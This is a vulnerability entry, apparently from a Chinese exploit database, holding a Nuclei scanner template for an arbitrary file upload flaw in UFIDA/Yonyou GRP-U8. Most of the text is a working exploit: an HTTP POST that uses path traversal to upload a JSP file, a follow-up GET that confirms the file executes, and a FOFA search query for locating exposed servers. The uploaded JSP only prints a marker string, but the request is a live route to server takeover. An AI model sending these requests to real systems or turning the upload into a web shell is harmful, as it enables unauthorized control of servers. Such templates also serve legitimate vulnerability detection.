漏洞描述
File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
grp-u8-uploadfiledata: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
PoC代码[已公开]
id: grp-u8-uploadfiledata
info:
name: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
reference:
- https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag
metadata:
verified: true
max-request: 2
fofa-query: title="用友GRP-U8行政事业内控管理软件"
tags: yonyou,fileupload,grp,intrusive,vuln
http:
- raw:
- |
POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}
Content-Length: 327
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
Accept-Encoding: gzip
------WebKitFormBoundaryqoqnjtcw
Content-Disposition: form-data; name="upload"; filename="emgeyr.jsp"
Content-Type: application/octet-stream
<% {out.print("{{randstr_2}}");} %>
------WebKitFormBoundaryqoqnjtcw
Content-Disposition: form-data; name="submit"
submit
------WebKitFormBoundaryqoqnjtcw--
- |
GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
condition: and
# digest: 4a0a00473045022100df4941a4345f819cf58ac7200d498635c7023c178c37c822531288e23c7b803e02202a80370b447413f3dfa812172cf5d9b8f8afd11e8805115d7c38203cab0bf1f9:922c64590222798bb761d5b6d8e72950